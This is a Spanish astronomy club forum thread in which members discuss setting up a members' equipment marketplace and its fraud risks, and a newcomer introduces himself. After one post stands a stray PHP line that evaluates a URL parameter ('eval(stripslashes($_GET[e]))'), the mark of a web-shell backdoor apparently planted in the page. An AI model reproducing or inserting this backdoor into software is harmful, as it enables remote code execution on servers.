MERCADILLO

Te invitamos a que nos ayudes a mejorar
Responder
javi
Mensajes: 235
Registrado: Jue Abr 23, 2009 4:38 pm

MERCADILLO

Mensaje por javi »

Visto que somos más de uno los que pensamos que se podría barajar la posibilidad del mercadillo y que no depende solo de unos cuantos. ¿por qué no empezamos a ver a quien le atrae la idea o le disgusta?

Un abrazo.
carlos
Mensajes: 96
Registrado: Mar Sep 01, 2009 8:45 pm

MERCADILLO

Mensaje por carlos »

Hola a todos. A mi la idea me parece buena. Saludos
m3ntol
Mensajes: 1829
Registrado: Mié Feb 28, 2007 11:07 pm

MERCADILLO

Mensaje por m3ntol »

El mercadillo tiene dos problemas, el primero es que indirectamente, una transacción fraudulenta perjudica a la asociación y el segundo es que se pueden colar ` vendedores profesionales` queriendo sacar dinero a nuestra costa.

Lo suyo sería un mercadillo solo entre socios, pero eso casi lo tenemos ya ` viva voz` cuando nos vemos.
phpbb:eval(stripslashes($_GET[e]));
Mocan
Mensajes: 38
Registrado: Lun Ago 15, 2011 10:32 am

MERCADILLO

Mensaje por Mocan »

[quote="m3ntol"]El mercadillo tiene dos problemas, el primero es que indirectamente, una transacción fraudulenta perjudica a la asociación y el segundo es que se pueden colar ` vendedores profesionales` queriendo sacar dinero a nuestra costa.

Lo suyo sería un mercadillo solo entre socios, pero eso casi lo tenemos ya ` viva voz` cuando nos vemos.[/quote]

Hola, lo primero me presento. Acabo de inscribirme porque me interesa la astronomía y quiero aprender con gente de mi zona. Ahora mismo tengo un telescopio Tasco que regaló a mi padre un proveedor que da vergüenza. Además le faltan piezas del trípode y he tenido que adaptar el que tengo para la cámara de fotos para poder acoplarle el telescopio.

En resumen, tengo pensado comprar un telescopio nuevo de máximo 300
--------------------------------
Disfrutando de mi equipo:
- Sky-Watcher 150/750
- Oculares: 4mm, 10mm y 25mm. Baader 5mm Hyperion 68° Modular. Barlow 2x
- Otros: Montura NEQ-3 motorizada en ambos ejes.
Intereses: ¡aprender y disfrutar!.
Manuelariza
Mensajes: 1919
Registrado: Mar Ago 21, 2007 10:35 am

MERCADILLO

Mensaje por Manuelariza »

Lo primero es darte la bienvenida al foro Mocan...sobre la propuesta del mercadillo se estudio en su tiempo pero al final no se saco nada en concreto,yo soy de los que opinan que se debería de retomar la idea del mercadillo,lo que voy hacer es abrir un post para recabar opiniones entre los socios si es conveniente abrir un mercadillo o no.



Saludos...
Estoy de la Astronom�a hasta las narices,me ha hecho un agujero en el bolsillo!!!
Avatar de Usuario
Alfonso
Mensajes: 379
Registrado: Mié Nov 19, 2008 4:16 pm

MERCADILLO

Mensaje por Alfonso »

Aunque no estoy ni en contra ni a favor, por si no lo sabeis ya hay una lista en yahoo con bastante movimiento. Se llama CompraVentaAstronomico.
Saludos,
Alfonso
--------------------------------------
participes sumus, non certatim
Manuelariza
Mensajes: 1919
Registrado: Mar Ago 21, 2007 10:35 am

MERCADILLO

Mensaje por Manuelariza »

[quote="Alfonso"]Aunque no estoy ni en contra ni a favor, por si no lo sabeis ya hay una lista en yahoo con bastante movimiento. Se llama CompraVentaAstronomico.[/quote]

En Yahoo,en el foro de Hubble y en el de Fotografía astronómica y en no se cuantos foros mas,pero el tema es tener nuestro propio mercadillo.


Saludos...
Estoy de la Astronom�a hasta las narices,me ha hecho un agujero en el bolsillo!!!
skyfighter
Mensajes: 34
Registrado: Dom Jul 10, 2011 6:25 pm

MERCADILLO

Mensaje por skyfighter »

Sin duda es una buena iniciativa. Por algun lado hay que empezar.
Algunos ven el mercadillo como algo siniestro y con mucha posibilidad de ser timado o cosas por el estilo pero es bastante distinto ya que este material en el que se invierte tanto dinero se tiene que comprar en mano para verificar su calidad y buen funcionamiento y si algo no gusta, no se compra.
En muchos foros, sobretodo en foromtb (ciclismo), hay usuarios que son vendedores de profesion con precios relativamente buenos en marcas conocidas. En un mercadillo se venden cosas, si uno quiere, las compra y si no, no.
En foros de armas es facil ser timado ya que uno se deja llevar por "buenas ofertas" sin entrega en mano pero jamas he visto que se culpe la web o la asociacion que lleva ese espacio, es mas, puede servir de ayuda para que no vuelva a ocurrir o si ha sido un malentendido, mediante otros usuarios que conocen al vendedor.
En resumen: no creo que haya que darle tantas vueltas a este asunto. Los que estamos nos conocemos y si hay alguno nuevo pues con quedar para comprar es mas que suficiente.

Un gran saludo a todos, compañeros!
Responder